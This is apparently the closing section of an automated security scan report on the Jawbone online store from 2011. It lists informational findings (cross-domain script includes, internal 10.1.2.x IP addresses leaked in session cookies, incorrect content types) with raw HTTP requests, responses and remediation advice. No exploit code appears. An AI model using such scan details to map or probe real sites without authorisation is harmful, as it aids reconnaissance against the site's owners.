Date: Tue, 17 May 2011 11:06:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<link rel="stylesheet" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jbMain.css" type="text/css">

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery-1.3.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jbMain_new_1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/MiniCart.ShoppingCartService.jQuery-1.3.min.js"></script>
...[SNIP]...
<!-- OwnerIQ Retargeting Tag -->
<script type="text/javascript" src="http://px.owneriq.net/anst/s/jawb.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery-1.4.2.js"></script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/stylishSelect.dltabs.overlay.dropshadow.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery.pngshadows-1.1.min.js"></script>
...[SNIP]...
</script>


    <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/s_code.js"></script>
...[SNIP]...

3.4. http://store.jawbone.com/store/aliphcom/en_US/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /store/aliphcom/en_US/home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/aliphcom/en_US/home HTTP/1.1
Host: store.jawbone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; s_cc=true; __utmz=28970110.1305629710.1.1.utmcsr=mytalk.jawbone.com|utmccn=(referral)|utmcmd=referral|utmcct=/jb2/mytalk/beta; s_sq=%5B%5BB%5D%5D; __utma=28970110.1236121905.1305629710.1305629710.1305629710.1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; __utmc=28970110; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; ORA_WX_SESSION="10.1.2.196:516-0#0"; __utmb=28970110.1.10.1305629710;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22705517804,0)
Content-Length: 347875
Date: Tue, 17 May 2011 11:06:21 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<link rel="stylesheet" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jbMain.css" type="text/css">

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery-1.3.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jbMain_new_1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/MiniCart.ShoppingCartService.jQuery-1.3.min.js"></script>
...[SNIP]...
<!-- OwnerIQ Retargeting Tag -->
<script type="text/javascript" src="http://px.owneriq.net/anst/s/jawb.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery-1.4.2.js"></script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/stylishSelect.dltabs.overlay.dropshadow.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery.pngshadows-1.1.min.js"></script>
...[SNIP]...
</script>


    <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/s_code.js"></script>
...[SNIP]...

4. Private IP addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


4.1. http://store.jawbone.com/store/aliphcom/DisplayHomePage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /store/aliphcom/DisplayHomePage

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /store/aliphcom/DisplayHomePage HTTP/1.1
Host: store.jawbone.com
Proxy-Connection: keep-alive
Referer: http://mytalk.jawbone.com/jb2/mytalk/beta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=217104781.1305629392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=217104781.1224326782.1305629392.1305629392.1305629392.1; __utmc=217104781; __utmb=217104781.2.9.1305629650743; s_sq=oneoverzerotechjawbonedev%3D%2526pid%253Dhttp%25253A//jawbone.com/%2526oid%253Dhttp%25253A//mytalk.jawbone.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.1.2.211:516-0#0"; path=/
Set-Cookie: JSESSIONID=FCE84FC4750248CE23D485783007F389; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E867632A0385EC96E2; expires=Wed, 16-May-2012 16:47:46 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=203093666536,0)
Date: Tue, 17 May 2011 10:58:34 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app55
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3540123914.516.0000; path=/
Content-Length: 238177


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...

4.2. http://store.jawbone.com/store/aliphcom/DisplayHomePage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /store/aliphcom/DisplayHomePage

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /store/aliphcom/DisplayHomePage HTTP/1.1
Host: store.jawbone.com
Proxy-Connection: keep-alive
Referer: http://mytalk.jawbone.com/jb2/mytalk/beta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=217104781.1305629392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=217104781.1224326782.1305629392.1305629392.1305629392.1; __utmc=217104781; __utmb=217104781.2.9.1305629650743; s_sq=oneoverzerotechjawbonedev%3D%2526pid%253Dhttp%25253A//jawbone.com/%2526oid%253Dhttp%25253A//mytalk.jawbone.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Set-Cookie: JSESSIONID=67EBE9946C98E71BDB312589A94DA2EB; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED43679EE28EAB07478C06C870489FE463AAEB; expires=Wed, 16-May-2012 16:55:24 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22705505976,0)
Date: Tue, 17 May 2011 11:06:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; path=/
Content-Length: 238175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...

4.3. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440000/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /store/aliphcom/cat/CategoryID.52440000/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /store/aliphcom/cat/CategoryID.52440000/ HTTP/1.1
Host: store.jawbone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; s_cc=true; __utmz=28970110.1305629710.1.1.utmcsr=mytalk.jawbone.com|utmccn=(referral)|utmcmd=referral|utmcct=/jb2/mytalk/beta; s_sq=%5B%5BB%5D%5D; __utma=28970110.1236121905.1305629710.1305629710.1305629710.1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; __utmc=28970110; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; ORA_WX_SESSION="10.1.2.196:516-0#0"; __utmb=28970110.1.10.1305629710;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=104309908256,0)
Content-Length: 37354
Date: Tue, 17 May 2011 11:06:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...

4.4. http://store.jawbone.com/store/aliphcom/cat/CategoryID.52440300/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.jawbone.com
Path:   /store/aliphcom/cat/CategoryID.52440300/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /store/aliphcom/cat/CategoryID.52440300/ HTTP/1.1
Host: store.jawbone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; s_cc=true; __utmz=28970110.1305629710.1.1.utmcsr=mytalk.jawbone.com|utmccn=(referral)|utmcmd=referral|utmcct=/jb2/mytalk/beta; s_sq=%5B%5BB%5D%5D; __utma=28970110.1236121905.1305629710.1305629710.1305629710.1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; __utmc=28970110; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; ORA_WX_SESSION="10.1.2.196:516-0#0"; __utmb=28970110.1.10.1305629710;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Set-Cookie: ORA_WX_SESSION="10.1.2.196:516-0#0"; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22705533035,0)
Content-Length: 37374
Date: Tue, 17 May 2011 11:06:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...

5. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


5.1. http://store.jawbone.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.jawbone.com
Path:   /DRHM/store

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /DRHM/store?Action=DisplayPage&SiteID=aliphcom&Locale=en_US&Env=BASE&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: store.jawbone.com
Proxy-Connection: keep-alive
Referer: http://store.jawbone.com/store/aliphcom/DisplayHomePage
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=217104781.1305629392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=217104781.1224326782.1305629392.1305629392.1305629392.1; __utmc=217104781; __utmb=217104781.2.9.1305629650743; ORA_WX_SESSION="10.1.2.196:516-0#0"; JSESSIONID=4F404B162F415665D093FBF07BC8B0A1; VISITOR_ID=971D4E8DFAED4367D81AE4C64C4129E8258FB16BFFB40D33; BIGipServerp-drh-dc1pod5-pool1-active=3288465674.516.0000; __utmz=28970110.1305629710.1.1.utmcsr=mytalk.jawbone.com|utmccn=(referral)|utmcmd=referral|utmcct=/jb2/mytalk/beta; __utma=28970110.1236121905.1305629710.1305629710.1305629710.1; __utmc=28970110; __utmb=28970110.1.10.1305629710; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/css;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=100014451924,0)
Date: Tue, 17 May 2011 10:58:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app52
Content-Length: 6614


<!-- REQUEST ID: TIME=1305629915230:NODE=c1a5202:THREAD=67 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=aliphcom&ceid=171098600&cename=TopHeade
...[SNIP]...

5.2. http://store.jawbone.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.jawbone.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: store.jawbone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ORA_WX_SESSION="10.1.2.73:516-0#0"; JSESSIONID=3B32E4C3EF0789CCE30B32624F508531; VISITOR_ID=971D4E8DFAED43679EE28EAB07478C0623A8D726FE572414; BIGipServerp-drh-dc1pod5-pool1-active=1224868106.516.0000; __utma=28970110.1380708171.1305630862.1305630862.1305630862.1; __utmb=28970110.2.10.1305630862; __utmc=28970110; __utmz=28970110.1305630862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
ETag: "37e-4b6b21a0"
Content-Type: text/plain
Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=15264;ecid=108605399107,0)
Content-Length: 894
Date: Tue, 08 Feb 2011 04:10:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app58
Accept-Ranges: bytes

..............h.......(....... ...............H...H...........................................................VVW        
       
       
                                                                                       .....tOL+.        
       
       
                                       ...Q.        

...[SNIP]...

Report generated by XSS.CX at Tue May 17 06:22:34 CDT 2011.